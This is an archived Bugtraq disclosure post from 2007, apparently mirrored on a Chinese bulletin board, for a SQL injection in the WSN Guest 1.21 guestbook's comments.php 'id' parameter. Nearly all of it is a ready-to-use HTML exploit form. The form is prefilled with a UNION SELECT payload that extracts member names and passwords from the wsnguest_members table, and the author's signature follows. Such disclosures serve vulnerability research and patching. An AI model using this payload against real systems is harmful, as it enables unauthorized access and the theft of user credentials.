WSN Guest 1.21 Version Comments.PHP "ID" SQL Injection Exploit

看板Bugtraq作者時間19年前 (2007/03/15 02:32), 編輯推噓0(000)
留言0則, 0人參與, 最新討論串1/1
<!-- WSN Guest 1.21 Version Comments.PHP "ID" SQL Injection Exploit Type : SQL Injection Release Date : {2007-03-14} Product / Vendor : WSN Guestbook http://scripts.webmastersite.net/wsnguest/ Bug : http://localhost/script/comments.php?id=-SQL Inj.- SQL Injection Exploit : --> <title>WSN Guest 1.21 Version Comments.PHP "ID" SQL Injection Exploit</title> <body bgcolor="#000000"> <form name="entryform" method="get" action="" rel="nofollow">http://localhost/script/comments.php"> <table width="500" border="0" align="center"> <font face="Verdana" size="2" color="#FF0000"><b>WSN Guest 1.21 Version Comments.PHP "ID" SQL Injection Exploit</b></font> <br> <tr> <td align="right"><font face="Arial" size="1" color="#00FF00">SQL Injection Code</td> <td>&nbsp;</td> <td><input name="id" type="text" value="-1/**/UNION/**/SELECT/**/name,password,null,null,null,null,null,null,null,null,null/**/FROM/**/wsnguest_members/*" class="inputbox" style="color: #000000" style="width:300px; "></td> </tr> <tr> <td align="right"><font face="Arial" size="1" color="#00FF00">Search Board</td> <td>&nbsp;</td> <td> <select name=""> <option>(ALL)</option> </select>&nbsp; <input type="submit" value="Apply"> </td> </tr> </table> </form> <center><font face="Verdana" size="2" color="#FF0000"><b>UniquE-Key{UniquE-Cracker}</b></font> <br> <font face="Verdana" size="2" color="#FF0000"><b>UniquE@UniquE-Key.ORG</b></font> <br> <font face="Verdana" size="2" color="#FF0000"><b>http://UniquE-Key.ORG</b></font></center> <!-- Tested : WSN Guest 1.21 Vulnerable : WSN Guest 1.21 WSN Guest 1.02 Author : UniquE-Key{UniquE-Cracker} UniquE(at)UniquE-Key.Org http://www.UniquE-Key.Org -->
文章代碼(AID): #15-3_800 (Bugtraq)